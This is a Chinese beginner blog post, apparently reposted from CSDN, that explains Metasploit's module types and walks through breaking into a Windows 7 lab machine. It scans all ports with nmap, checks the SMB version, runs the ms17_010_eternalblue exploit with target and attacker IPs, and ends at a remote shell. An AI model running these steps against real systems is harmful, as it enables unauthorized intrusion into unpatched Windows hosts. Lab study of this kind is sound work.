标签:Metasploit 渗透 扫描 win7 -- 模块 入侵 smb
文章目录
一、Metasploit是什么?
这里我简单介绍一下,方便你们小白了解(大佬直接跳过就行)
Metasploit框架是一个开源工具,旨在方便渗透测试,他是有ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板。Metasploit可向后端模块提供多种用来控制测试的接口。Metasploit还有第三方接口,如nmap、SQLMap,可以直接在控制台使用。
1、Auxiliaries(辅助模块)
该模块主要作用是扫描、嗅探、指纹识别辅佐渗透。
2、Exploit(渗透攻击模块)
该模块里面包含许多类型模块,渗透测试者利用这些模块多漏洞进行利用
3、payload(攻击载荷模块)
该模块用于渗透攻击成功之后,在目标系统执行任意命令或者执行特点代码,总结来说就是建立目标机与攻击机稳定连接,可返回shell或进行注入
4、Post(后期渗透模块)
该模块主要用于在获取目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、实施跳板攻击。
5、Encoder(编码工具模块)
该工具在渗透测试中负责免杀,以防止被杀毒软件、防火墙、IDS及类似的安全软件检测出来
。
二、Metasploit入侵步骤
1.准备
1、首先你要确定两台主机在同一网段,并且能够ping通,这些我就不做演示了
2、更新软件
apt-get update
apt-get upgrade
3、msfconsole:打开metasploit
2.扫描端口
1、直接在metasploit框架里使用nmap扫描端口
你们也可以使用模块进行扫描
nmap -p 1-65535 -Pn 192.168.0.1
3、查看版本
1、search scanner/smb/smb_
2、use 7 -->show options -->set rhosts 192.168.0.1 -->run
4、查找对应利用漏洞模块
1、search exploit/windows/smb/
2、use exploit/windows/smb/ms17_010_eternalblue-->set rhost靶机ip-->set lhost 攻击机ip
我不知道你们这里的payload是不是主动配置的或者加上去的,我这由于以前玩过,不太清楚,如果不是或有问题请告知。
3、这里我们就成功了
5、shell
到了这一步就随便你们怎么玩了!
shell --> chcp 65001
注:如果我这里讲的有哪里不太详细、遗漏或错误,请及时告知。Thanks♪(・ω・)ノ!
标签:Metasploit,渗透,扫描,win7,--,模块,入侵,smb 来源: https://blog.csdn.net/qq_53030229/article/details/121188795
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。